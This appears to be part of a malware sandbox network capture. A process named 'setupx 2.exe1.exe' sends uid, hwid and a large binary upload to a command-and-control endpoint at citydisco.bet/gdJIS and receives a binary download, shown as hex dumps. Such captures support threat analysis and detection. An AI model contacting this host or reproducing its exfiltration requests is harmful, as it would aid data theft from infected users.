2025-03-13 12:33:44 UTC	277	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=f3ZvH0vY6SO5s User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 551933 Host: citydisco.bet
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 2d 2d 66 33 5a 76 48 30 76 59 36 53 4f 35 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 61 32 65 39 36 32 38 39 62 65 61 35 32 36 30 36 35 37 31 30 33 39 65 33 31 62 64 34 65 31 31 35 34 62 38 31 65 36 66 62 63 32 63 31 36 38 63 32 63 63 61 63 0d 0a 2d 2d 66 33 5a 76 48 30 76 59 36 53 4f 35 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 66 33 5a 76 48 30 76 59 36 53 4f 35 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 38 35 42 37 39 33 34 Data Ascii: --f3ZvH0vY6SO5sContent-Disposition: form-data; name="uid"a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac--f3ZvH0vY6SO5sContent-Disposition: form-data; name="pid"1--f3ZvH0vY6SO5sContent-Disposition: form-data; name="hwid"F85B7934
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 9c 11 c2 33 42 e2 44 5d 01 0f dc 64 4c 36 68 2b 0b bd f8 a4 60 e9 33 9a af 60 a7 ae c1 ca 06 77 a0 0f dc d6 e6 16 24 df f7 04 b3 83 8a 89 e9 1b 81 37 b3 92 7b 7b 31 32 06 5d a1 1a ae be 0c fa 9a e3 d5 18 76 cd cf 2d 3a 66 52 ec 0c a0 a3 02 49 b8 c8 ed 98 aa a1 52 70 7c 2d 91 07 36 6e c6 9d ac 9d 48 39 6d b1 1a aa 1f 5f 17 f5 1e 89 90 7a 30 46 32 8a bf 3a 9c 75 d3 a0 3c eb 1f 02 e6 7c da c3 59 99 1a 51 df e7 68 ca 90 6f 84 69 28 08 a7 d1 39 09 1a 51 0a a2 d9 01 bb 06 1c a9 2a cf a7 ac a9 2c 53 6a 5a 86 7a 42 f8 cb 28 e5 90 25 6a c8 fd 9a 1c be 1a d9 62 af 79 92 87 a1 8e 87 d5 99 23 f6 16 3a be 9d a1 d6 9b 15 9e 74 62 13 78 4d a2 3b ed f4 3c 93 23 dd 49 ac f7 d5 0a eb 0d f6 b7 e4 2c 2d 40 74 7d 13 f5 69 17 67 2d 27 2e eb 3c 4b 2c f0 77 99 15 9c 88 e3 bd 11 Data Ascii: 3BD]dL6h+`3`w$7{{12]v-:fRIRp\|-6nH9m_z0F2:u<\|YQhoi(9Q*,SjZzB(%jby#:tbxM;<#I,-@t}ig-'.<K,w
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 2a 09 fb 10 f6 e0 46 62 95 ab ba 24 ee 08 0f 71 fd 1c 02 d8 9b 6e e5 d7 f1 ee d3 b5 a0 88 a0 bc a9 6f bb 50 94 1a f0 1b 40 f6 98 c2 72 ab f6 fb 59 a2 b4 27 2c 3d 7c 2b db 82 4c 64 2c 2d be 27 59 31 bb 8d ac fc 59 04 2b 95 39 8d eb 8c 42 7e f1 ad f2 c9 8a 38 a3 b4 f7 e2 a8 2d e4 c1 e7 bb eb 09 be 3e 67 d3 77 1f 78 bc bf eb 22 54 7b 96 f2 cb ff 1a 8d e3 09 30 e3 70 41 c7 69 a5 04 74 f6 10 1b e3 6e d4 1a 42 f8 32 85 08 0b a0 2b cb e2 f0 d2 36 e4 7d bf 57 41 ed 3a 4d db 01 9d fa 68 1f bb eb 6b 9e dd e6 87 34 d5 7c 13 52 ff c8 d2 74 0e d5 1b 74 cb 26 60 9f bb ab ea 71 68 6b 11 0d 2f 22 ce 7a 41 da c6 df 3f 99 24 4c 06 07 3e ec 34 a1 c8 42 ad 65 10 7f be 12 e7 66 72 21 9d b2 fc ca 14 93 58 c3 51 31 89 00 4b a1 06 c1 f3 c2 b6 96 8b f4 a1 7b 39 85 4c ed 4e 32 3e Data Ascii: *Fb$qnoP@rY',=\|+Ld,-'Y1Y+9B~8->gwx"T{0pAitnB2+6}WA:Mhk4\|Rtt&`qhk/"zA?$L>4Befr!XQ1K{9LN2>
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 5f d6 d6 0a ea 39 c5 bd 75 a8 72 72 62 4b 3d 4e 0c 28 79 04 05 52 c5 f4 9f 74 c6 92 9c 8b 07 af cb 87 68 be 27 48 f7 08 60 3c 4d 9b 0c 85 d3 83 75 54 6a 56 40 e0 b8 73 c3 b4 30 ba da 2f 8b 9c d9 14 72 d7 36 6e 0a c9 8d 26 20 2a a0 5f 97 9a 2a 6b 41 c1 21 f5 1b ad ce 45 b8 f9 2a d7 b3 02 60 27 59 88 b7 68 59 dd 23 c1 da 1f 3e ad bd 8f 2b 68 a8 ca fe c9 ed 06 cf db 0b 80 e5 2f b1 b1 8c 19 5d fa 4f 24 42 80 34 19 65 9d e7 87 2f de 32 22 d9 c1 8f b7 9b 52 58 2f f6 8a 90 ca e1 78 b4 71 0e 6b 1a a9 0c e5 10 bb eb 37 19 5c 9a e3 50 8c 79 59 02 74 e5 5b 36 39 d9 f8 ed c9 ab d3 6f 7d 9c fc a0 21 14 d4 40 5c f2 8b b2 ea 5a a1 77 fc 0d 8c 21 f4 82 ba 05 c7 ea 22 3b 1a fd 4f 38 c4 0e 7f 43 bf 8a 03 d4 87 7f 8f 66 81 a0 86 d2 fb 69 39 ae 80 64 2e d1 df af 5c 51 7e fc Data Ascii: _9urrbK=N(yRth'H`<MuTjV@s0/r6n& _kA!E*`'YhY#>+h/]O$B4e/2"RX/xqk7\PyYt[69o}!@\Zw!";O8Cfi9d.\Q~
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 59 f8 47 5f 65 8e cc f6 06 45 b1 f3 89 6e 12 9c 55 fb 6d f2 25 dc 69 85 70 83 4c 62 78 e8 f1 9d ba 0e ff c4 ec 54 88 c5 63 33 18 63 91 87 96 ab f8 cb 48 b9 87 14 73 3b a4 40 d3 19 be 90 fa 45 16 77 4f 08 b2 f7 55 a3 7c 89 9c 6c 06 fc 92 f1 be 3e 9c df 0b a8 f7 de 28 67 c5 92 ed 86 cf 96 60 e6 16 fb 74 21 0e c6 b3 01 f4 8a 35 bb 47 d0 c4 db 23 6e 05 58 f7 71 4c 60 ec 17 56 3c 6e 87 ab 73 2f 2f fd 54 29 e9 b1 88 2c 8e c1 9f 58 f6 1b fa 09 2a 5c ad 84 05 58 04 f4 35 60 74 70 0b 1e 3d 38 12 2a fc 93 79 a5 93 f1 2e cc f3 47 0c 47 3a 90 24 c5 1f ec d4 39 13 97 59 7a 99 6e 07 5d fa 30 b9 03 ad a4 1f eb 7f 96 75 1c fe 40 e6 c8 c6 7a 27 e0 f5 38 e5 85 38 b1 2c 6e 32 ec 82 ba df 4a 00 0c 94 50 2e 7c a4 4a fe 5f e8 d6 77 aa 54 59 11 78 bb d2 fc 54 6f 45 3a 30 0b 1f Data Ascii: YG_eEnUm%ipLbxTc3cHs;@EwOU\|l>(g`t!5G#nXqL`V<ns//T),X\X5`tp=8y.GG:$9Yzn]0u@z'88,n2JP.\|J_wTYxToE:0
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 0e 4a b3 b2 8a dc ef cc b3 52 c6 69 42 4b 8e 3c 76 7f 76 ce 23 b1 91 a3 30 fc d4 d0 aa 3a f4 0c 88 3c 95 e0 a3 3b 61 e1 f1 a4 79 c7 ae 2c b4 b1 32 c6 fe b8 59 d1 13 83 e2 99 2c a1 b6 6a 0f ae 3a 42 f2 4a e7 22 ae 54 06 52 9a 20 fb 75 7d 79 4a ef 2f 0f 46 a6 38 6f ea 99 57 e9 42 50 9f 01 9a 19 61 db 94 44 1a 59 e5 7d 24 0b 2e 6b cf dc 4e 91 45 25 8f 57 e5 8d d9 3a 72 0c 8a 5c ff 22 86 ab 4e 77 2d 40 47 d1 27 25 be bf 98 a4 b1 62 ce 66 ca ba 40 ab b1 6a 1a cc 56 f9 31 02 0a 31 83 1a 74 e4 f4 86 0b 5b 7f 30 40 00 5a 04 6b 4f 27 92 b3 5d 62 06 0a 4b a3 ae 8b 2e 34 cb 1a 6f c9 2f c3 40 ea 77 c2 74 29 23 f9 1c 12 68 47 39 d4 68 87 f1 60 4a 01 d6 a0 56 98 a9 f2 8b 23 58 9b 04 4f 57 06 55 6e 69 a0 c8 51 72 7a 82 0f e5 2b ba 38 2a 17 82 56 ae a4 05 8f aa b3 a7 33 Data Ascii: JRiBK<vv#0:<;ay,2Y,j:BJ"TR u}yJ/F8oWBPaDY}$.kNE%W:r\"Nw-@G'%bf@jV11t[0@ZkO']bK.4o/@wt)#hG9h`JV#XOWUniQrz+8*V3
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: f3 ab 43 65 b9 8c 53 e8 76 08 af c7 31 da be 26 d2 9d be c9 62 8a e6 bb b7 86 40 28 1a 50 ec 00 77 46 66 1b 43 8c 63 5b 60 4b a8 80 bd dd b2 85 b4 c8 14 86 93 a8 f3 49 c6 08 a6 29 30 9e 1d 16 98 c8 2f 70 55 2e d4 e3 3d 25 b9 93 e3 90 31 2d 6f e9 38 70 93 15 79 a9 28 5a de cf b0 2d e3 6e 41 99 55 96 21 91 0c 81 26 65 5b 2e 6d a8 87 7e 71 29 2d 19 c0 7a c5 a9 15 c7 ce 82 20 b8 b0 67 92 4e 61 30 31 8e ef cb cb 2c f4 64 a5 1a 60 71 61 03 f5 92 35 60 23 7e 93 e1 cd 9b 63 d9 cc 7d 95 1e 95 7d 41 aa 83 05 7f cd 46 07 2a b3 49 47 52 09 67 ef 95 cf 5f 65 9e c7 22 92 ad 79 90 0f b1 53 bb 13 d3 6b de 96 ae cf 10 0f a1 87 eb b1 76 92 d0 ae 3a f5 26 52 92 1e 2b bf a4 42 69 d9 d8 f5 9c 9d b7 6d c7 62 1b 2b e6 1e 4d 8f f0 5a a8 2d e5 3b 6d bc 36 d3 c5 51 52 14 5e cb 2e Data Ascii: CeSv1&b@(PwFfCc[`KI)0/pU.=%1-o8py(Z-nAU!&e[.m~q)-z gNa01,d`qa5`#~c}}AF*IGRg_e"ySkv:&R+Bimb+MZ-;m6QR^.
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 7a 43 24 70 ac fb a8 ae e2 b1 3b 1f cd 23 a1 f8 52 2a a3 f6 92 0e a8 b5 c3 ce dc 8f 26 ea 92 41 03 fe 1b 4a 44 0d 96 65 37 e7 03 b6 9a 99 af 5f 21 54 28 81 e7 41 d7 32 e9 40 cc 7e e7 dd ce 4b 03 7f af 2b 24 6b 08 a1 16 65 66 ba 91 91 09 9a 49 60 21 72 0a e0 0b ce 05 1b c5 ce 27 dd a2 67 b7 bb 52 f8 a0 63 00 84 8d fc df 89 57 70 4b 74 59 47 1b 45 48 21 47 e1 c0 7c dd 31 cc f4 e6 7f 98 c1 74 11 15 86 a5 65 36 e3 4a e5 5a cd 0c 93 74 bd 1e 16 db 71 b9 8a 55 7b 71 eb bb 93 8a 82 96 97 44 b5 80 24 96 ba f1 10 63 35 69 a6 06 eb e6 91 a1 72 84 95 56 29 2f 0c d1 2b 87 ec 41 0e 24 77 42 a3 eb 8c 18 23 96 0e 52 1c a7 a2 b1 9d 42 c2 b6 d5 63 fe 97 84 d4 40 87 f9 a5 de 13 be 10 22 03 57 a7 63 f0 5a a8 97 09 e1 0d 71 97 d4 81 7a 85 43 45 02 45 84 2a 17 aa 55 c1 44 12 Data Ascii: zC$p;#R&AJDe7_!T(A2@~K+$kefI`!r'gRcWpKtYGEH!G\|1te6JZtqU{qD$c5irV)/+A$wB#RBc@"WcZqzCEEUD
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 43 53 21 74 f1 eb 74 44 e4 4b d3 90 d5 35 2e 2d 73 5a f8 db d5 56 e5 5c b0 e9 d1 ec 24 a0 34 5e 0b 62 99 6e 8e af ac 5f de ac d3 df 39 e8 24 02 6d 07 3a b2 80 3b f0 6c 86 b5 95 91 4e 01 2b 28 03 4a 1c 41 49 ad 85 45 7e 72 0e 4a b1 47 e3 94 bb 4d 21 93 c7 a5 df 77 7f 7b 6a 1b cb 49 05 49 d0 4d 24 57 0e 71 e5 44 81 a6 7c bc 90 2c df 76 a2 87 40 e9 f9 e4 f9 5e 7f 8d 7e 6c a2 29 5e 3c 73 9a 3f c0 1a c1 e9 b7 44 a1 5d c8 90 30 d2 49 e4 18 91 6b 14 18 32 39 11 57 88 33 d1 64 7c 28 7a 68 3b 29 35 7e d1 b8 4c ab 45 ae 2f f1 17 6d e8 74 90 5d 13 80 1c cc 19 9e 75 86 5a f9 3d 5e 97 f1 d8 0e 9d c6 55 c2 37 e0 ae c5 04 dd 40 84 a1 7d ec f4 8e 7e 3a 54 c2 26 b0 4e 27 db db f4 32 06 68 e2 aa ff 49 fc fe d8 cc 80 78 9d df bd 8b 3b f9 e2 5b fb e7 59 8a e6 72 bf fb d2 d6 Data Ascii: CS!ttDK5.-sZV\$4^bn_9$m:;lN+(JAIE~rJGM!w{jIIM$WqD\|,v@^~l)^<s?D]0Ik29W3d\|(zh;)5~LE/mt]uZ=^U7@}~:T&N'2hIx;[Yr
2025-03-13 12:33:44 UTC	15331	OUT	Data Raw: 35 2c ef 09 ed a4 1a 41 7a 6e d2 50 62 9d 1e e4 26 01 ee 66 51 33 73 f6 39 0c c4 db 52 27 0f 8f 14 11 56 48 78 9f 5a 79 74 e7 65 d1 45 a8 dd 7e a3 c4 62 3b f5 5d 53 8f 63 55 43 0f 1e 27 b8 69 a3 fb 74 4d 01 c3 23 7e 13 5e f0 c3 db 4c d0 b3 44 c0 be 51 76 fa 94 f4 24 80 9a e6 22 0a 44 bf ff d5 1d 7e b6 b0 b6 68 cb e5 f7 17 ab 37 8a b9 37 fa 75 3f 1d 2d ec 21 d8 35 d4 65 3b 23 08 e0 a2 4b 03 7d e2 46 01 25 45 05 0a 72 0f 33 82 65 35 6c aa 92 3e 27 85 fb 93 64 bf 5d 84 0f 2f 4a 8d ba 83 d2 a2 1f 3e 7f ae b4 39 9f cf 21 46 bf 3c 53 67 02 6d c7 e1 55 e8 37 d6 a4 43 11 17 83 3e 07 e3 a3 25 e2 91 c7 3d 46 c5 e3 38 59 05 d0 f0 6f e3 26 d5 37 d3 1f ed 0a 46 f8 d2 fe dc 6e 7a 0b 20 e3 cc 4a 45 37 5e a7 97 97 c8 58 a4 3b 84 f1 2f 2e 51 92 f1 67 f0 54 cd 02 38 07 08 Data Ascii: 5,AznPb&fQ3s9R'VHxZyteE~b;]ScUC'itM#~^LDQv$"D~h77u?-!5e;#K}F%Er3e5l>'d]/J>9!F<SgmU7C>%=F8Yo&7Fnz JE7^X;/.QgT8
2025-03-13 12:33:47 UTC	814	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NSgZJZOzoQyNVBB9spzrxwI5TKIk58fxyYBiRvX9p6qIY2riPxaJjGJL2I0Bv6%2Bo8vjhdTkaWOkTYwJq9%2BojqbJNJ3DtJNbn19Vtu236R3%2FSNo2F6bM4sHfDCgpOhAW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8fc0cc51eabc-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13504&min_rtt=13467&rtt_var=3861&sent=212&recv=427&lost=0&retrans=0&sent_bytes=2831&recv_bytes=554430&delivery_rate=210618&cwnd=246&unsent_bytes=0&cid=505c774901457ea2&ts=2989&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49693	188.114.96.3	443	5712	C:\Users\user\Desktop\setupx 2.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:33:49 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 99 Host: citydisco.bet
2025-03-13 12:33:49 UTC	99	OUT	Data Raw: 75 69 64 3d 61 32 65 39 36 32 38 39 62 65 61 35 32 36 30 36 35 37 31 30 33 39 65 33 31 62 64 34 65 31 31 35 34 62 38 31 65 36 66 62 63 32 63 31 36 38 63 32 63 63 61 63 26 63 69 64 3d 26 68 77 69 64 3d 46 38 35 42 37 39 33 34 43 33 35 43 45 45 46 31 42 39 32 39 37 36 46 34 37 46 39 39 44 42 46 34 Data Ascii: uid=a2e96289bea52606571039e31bd4e1154b81e6fbc2c168c2ccac&cid=&hwid=F85B7934C35CEEF1B92976F47F99DBF4
2025-03-13 12:33:49 UTC	790	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:33:49 GMT Content-Type: application/octet-stream Content-Length: 10527 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wo9m3KfpzZZTiOhSmm89o9Q85DK1B%2Bq%2FWI1T9dnK8MWW3qb9DidNwNzfZT6%2B%2FDV6dqphEvj4KE3rUJFP0iNy6u4tf%2FvHpFIYuSvoenvNubpY%2F%2B%2FDlv2NiEvMV9Vp%2Fuko"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb8fdb6c352246-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13931&min_rtt=13757&rtt_var=4023&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=998&delivery_rate=210403&cwnd=245&unsent_bytes=0&cid=59b2503f34cbfd1a&ts=947&x=0"
2025-03-13 12:33:49 UTC	579	IN	Data Raw: bb 68 3a 7a 1c bb 68 48 7c 1f b9 3b 2e ce 44 03 bf 0d 5d 3f 27 38 9d 14 53 c3 46 80 86 74 c7 b3 7e bb 3b 2b 3a bf 1c 97 ed 05 87 f2 47 fd 8e a4 65 96 e0 3c a8 c1 b0 6c b9 81 1a 05 2d e3 b8 8c 36 12 51 d3 9a b5 78 75 2d b1 44 83 7c bd ad 12 d4 0d e2 c3 04 c7 95 de 21 2b 83 31 d9 04 4b ec 04 43 19 8c aa 17 f4 09 0c 12 de ac e8 47 41 91 5a 55 a2 ef 31 7f 5a e6 96 70 16 aa ed 3f 8a 72 85 b0 de 03 3b 05 cb 4e f7 6e bc f9 33 af e9 d3 24 68 df 8f f3 8a 22 c9 5f 27 77 7d 76 c8 82 5f f7 97 3a db 19 f1 c9 41 82 d2 b2 eb 1d 4e 68 b7 df 24 ff cb 6f e9 82 9d 58 4c a0 a0 a0 7c d5 c2 43 d6 b0 84 d5 79 4d 31 24 ce 17 20 3f 37 d6 9c 2a 71 b9 84 93 32 1f 4b 8c 3d 17 ef c6 50 62 e2 46 52 4d 59 e6 84 d9 d3 0d dd 15 81 3c 56 b3 75 cd 97 4c 71 93 3e 6c 5d 9d e4 4d 96 9b 92 6f Data Ascii: h:zhH\|;.D]?'8SFt~;+:Ge<l-6Qxu-D\|!+1KCGAZU1Zp?r;Nn3$h"_'w}v_:ANh$oXL\|CyM1$ ?7*q2K=PbFRMY<VuLq>l]Mo
2025-03-13 12:33:49 UTC	1369	IN	Data Raw: 52 43 ed 2b df 7f c1 ea 56 3d e2 b0 ef fd de 20 93 2c e2 9f 53 a1 49 5f 67 11 b4 59 97 2b a3 f4 35 45 45 84 fe ba af 2c 28 10 3b c8 91 9d 09 34 e8 0f 88 f5 dd 6d 2f e0 cd d6 f8 88 b7 56 7a 1d 8a ae e3 6a 7e c8 5c 52 c3 72 70 ee b6 ea 17 72 bc 86 79 5e 3e 6c b3 52 0b 22 10 3f 2d b0 c9 15 36 97 61 54 23 3a 94 92 eb cc f6 be d1 af 4b 67 e6 80 fa cc 33 24 9c 1b 8f 96 d6 e2 0f c6 80 5f 79 5b 6c 4e 75 bc 67 cc b8 8d 6b 32 c4 d6 bb 18 0d 83 96 25 88 ae f7 91 ef ae 44 ee 2b e2 14 21 d5 18 47 2a b4 c8 d8 f1 9b a4 cd eb 20 2f ca 71 31 88 a5 4e f6 41 e3 f8 e4 01 58 fc cc 02 38 de 97 24 a2 57 ed fc 0c b9 d8 2f cb f0 f6 6b f9 99 67 f9 4c 2e ad 1a aa 15 6b 4c f6 b2 b6 31 1c c6 70 a8 2d cb 21 25 d1 44 e8 f8 2b 2a ab c4 6c 01 ff 88 5f f0 ee e1 0d 40 a9 22 d3 df f4 46 7d Data Ascii: RC+V= ,SI_gY+5EE,(;4m/Vzj~\Rrpry^>lR"?-6aT#:Kg3$_y[lNugk2%D+!G* /q1NAX8$W/kgL.kL1p-!%D+*l_@"F}
2025-03-13 12:33:49 UTC	1369	IN	Data Raw: bc 51 60 d1 48 ca a9 4a f9 90 37 09 f9 07 e1 ce ac 7c 03 f3 80 ab 10 f8 6a 1d 8c 53 ad 1d d9 3b 19 4e 9e 9a eb db 31 49 05 f5 03 44 c9 33 e6 b9 6e 84 4d 0e e9 74 ef 8f ec 11 b8 df b1 9e a1 21 b1 f0 e8 dd f3 34 3c 6b a9 55 74 33 3b 73 a1 bf e0 70 b8 66 93 db a9 1c fc cd 8b a5 d5 a7 cd 03 3c 13 7a 95 8c cd 67 b9 fb 44 a6 1d 86 08 48 73 dd d7 ba 06 64 21 14 a2 99 e2 64 6e 54 df cf bb eb dc d5 63 bc 0e 1a 9d 96 96 23 58 5b 7a ca 52 71 eb be 7b 4f bf 89 90 4b e9 a2 95 e2 c8 d4 ea 81 03 67 f2 92 bc e7 79 16 b3 3a e3 cd 43 ae 28 07 61 65 2e 3e d9 ee 6e b3 87 15 b6 a1 bc 8d 6a 35 0f 42 34 25 76 ce 57 a8 f4 b1 36 09 18 11 15 e8 93 cd bb 01 05 62 c3 d7 32 35 74 c1 4a a1 13 c7 12 d9 2c de 19 10 4a 77 27 db 56 27 c7 46 d2 ed 65 74 07 df e4 28 14 ec 33 99 54 0a 70 40 Data Ascii: Q`HJ7\|jS;N1ID3nMt!4<kUt3;spf<zgDHsd!dnTc#X[zRq{OKgy:C(ae.>nj5B4%vW6b25tJ,Jw'V'Fet(3Tp@
2025-03-13 12:33:49 UTC	1369	IN	Data Raw: 47 84 7a 52 2e a0 a0 a4 6a a1 d9 d5 93 07 66 d2 91 cd 95 1b 07 a9 8e a7 97 00 eb 7c af ba ee 57 46 66 37 b7 a7 d4 5d 22 fe 42 e1 b5 60 f6 cf af 11 7f f7 e3 46 08 ca 30 ba b6 fc b3 ef 57 71 53 db c2 c5 e5 81 88 76 43 14 ee 79 f4 af 15 22 41 cb ce bd 1b c4 e6 e1 36 0c c1 9e 26 7e 5d ca d5 29 13 6a 27 83 3c c6 58 45 f6 96 1a ad dd 9f c1 1a b4 32 0f 59 f9 60 05 c0 07 2b 08 4b 9e 8c 85 df 31 85 16 1a 22 bc 5d 9e ac a4 49 98 1b bb 8f 15 8d f8 a7 18 61 f3 63 b7 28 c7 c6 13 91 e5 bd fc be e6 7c 2d 8c 72 1f 6b 28 e6 5e 02 f2 9c f7 2c 93 a0 5b a1 04 4a 86 ff 40 10 6b e6 aa b2 fb 70 53 6f c1 4c 48 a3 00 3f ba a0 e3 b7 ff 54 26 fd 12 75 80 d2 a2 d0 29 7b 8c 6a 76 a0 95 bd a5 e5 cf 02 d9 c7 26 f2 58 7d a9 bf 9d 4a 05 8c e1 40 4a 75 f4 fb f9 3d 10 b6 02 ed e9 2e da e7 Data Ascii: GzR.jf\|WFf7]"B`F0WqSvCy"A6&~])j'<XE2Y`+K1"]Iac(\|-rk(^,[J@kpSoLH?T&u){jv&X}J@Ju=.
2025-03-13 12:33:49 UTC	1369	IN	Data Raw: c4 d0 33 1f be 9c ea ab 5f 6f 0a f6 a2 f9 b0 d2 23 90 4e 84 06 a6 32 b2 0d 59 fe 73 b4 25 b2 2e 35 08 50 78 9c 44 4f 4c a9 5d 08 be 0a 17 b1 ad dc 25 db 11 4b 39 73 bd 8a 6f 68 ee ac 8e 37 df 99 1d 03 81 74 12 5d 97 c7 8c 01 60 e3 3e 67 b2 66 91 2f 02 59 aa 98 18 58 fe ce a5 0a ed 5c 38 ad a9 de a5 7f 29 6c d2 1f 90 3b 0d b4 4f fa a7 73 a7 29 81 2d a5 6c 50 a6 93 3d 33 ec 25 32 ff c5 b9 76 f7 91 cb 42 49 4a 05 7a ec 63 96 ce ab c4 7e fb e6 b5 97 93 b5 a4 88 fb ab e8 7b b7 bb 15 8b 31 55 c8 f6 86 54 9d 20 55 d6 27 7a c6 ac d2 d1 95 22 49 b4 e4 99 62 b5 57 25 ce 49 28 62 d7 4a 50 b8 fe a9 8e 01 a8 51 4f 77 c6 f7 96 97 79 62 d7 cb 44 df 99 64 95 3a 08 b3 b4 3a dd c1 b4 d8 2c 85 01 fa a9 07 96 31 5b d1 27 f5 0d 27 bd 63 8d 56 07 f0 e1 fe 31 0f 85 c8 ca be d6 Data Ascii: 3_o#N2Ys%.5PxDOL]%K9soh7t]`>gf/YX\8)l;Os)-lP=3%2vBIJzc~{1UT U'z"IbW%I(bJPQOwybDd::,1[''cV1
2025-03-13 12:33:49 UTC	1369	IN	Data Raw: e3 ce a1 06 bf 7e 6e a8 da c0 14 3e 06 a9 a5 d7 2a 1e 06 69 b2 ba ca b3 71 1b 75 fe 5c 84 15 4f d6 06 6e 7c 6c a6 74 ed d7 b4 a5 32 32 0f 9b 10 35 7f 90 0e dc 33 7f df 02 e7 e9 13 23 50 d9 b8 24 3a 78 50 6b 9c f0 58 81 f5 3a cd 44 2b d8 06 7b 76 f1 77 2b fa a7 9b a0 94 90 f7 82 2f 6a bb cb 84 fd 39 5a 18 d9 b7 0d 26 5b 6b 47 16 b8 58 64 20 82 48 b1 b4 0c 8a e0 c4 e0 ac 94 c6 c4 e8 84 25 91 c6 26 f8 20 d5 1b e2 88 1e 04 f3 81 7f 3d e6 b4 8c a4 14 7e ef dd 6f 0b 81 13 39 20 f5 e9 4e 4e 5a d0 70 7e 20 b8 f3 15 5d 17 25 48 93 4c da 81 80 cc 57 07 29 97 d9 12 75 33 00 c4 0f f3 6d 38 f9 bb db 82 9b f3 3a 08 11 b9 51 24 e4 1c be 8c 32 02 b8 e1 4e 10 f0 4b aa 3e 63 f0 32 ca 54 1e 3f f6 3a ae 35 30 c0 4f 8e 7e 02 76 04 5b 68 64 64 fd f3 de 06 63 d3 04 49 9a a2 08 Data Ascii: ~n>*iqu\On\|lt2253#P$:xPkX:D+{vw+/j9Z&[kGXd H%& =~o9 NNZp~ ]%HLW)u3m8:Q$2NK>c2T?:50O~v[hddcI
2025-03-13 12:33:49 UTC	1369	IN	Data Raw: ad a1 85 1f 48 a8 b7 c8 4b a2 41 c5 29 bb 3e 0d fb 2f 7b ed 51 bd e2 53 1d a1 df 24 0c c3 35 bd 7b 02 1c 23 2c c9 9a f0 97 64 cb ad 4c be eb d0 3b 7a 6d e7 9a 63 7b 24 85 eb c3 a7 2b ce 87 5f 11 ae b7 58 4a 0a e0 ee d3 cf 39 be d5 8c dd a7 e2 a4 b2 17 8d 2f b3 5c 79 fb f4 6e d6 c6 64 af bb 51 2a 16 f8 a5 e1 04 0f 54 01 08 8a d6 38 fa 6d b7 7b 71 2f 48 2f 7f 82 c6 53 d0 b6 1c 81 7d 87 f8 b5 f4 56 a8 2d 1c 97 a0 1b 0d 6e aa 68 a9 87 82 27 ab 9a 4d 08 09 37 5b a1 c0 79 91 76 46 66 0d 63 11 a5 8c f4 3e d4 3d 62 d8 77 ca de a4 6f 8e 1a bc 3f e0 d8 e8 53 38 ea 30 22 d3 4c 99 e0 6b 94 28 f3 c1 3c 36 ea d5 fa 65 8b ae 34 0e a8 ef 06 bc 32 c8 6c 47 1e df a8 93 eb 3a e2 ff d6 cc 66 c0 d6 ae bb 81 25 08 21 bf 42 fd ae 2e 07 83 2f b4 31 db 4a bf 80 d4 b8 91 82 32 17 Data Ascii: HKA)>/{QS$5{#,dL;zmc{$+_XJ9/\yndQ*T8m{q/H/S}V-nh'M7[yvFfc>=bwo?S80"Lk(<6e42lG:f%!B./1J2
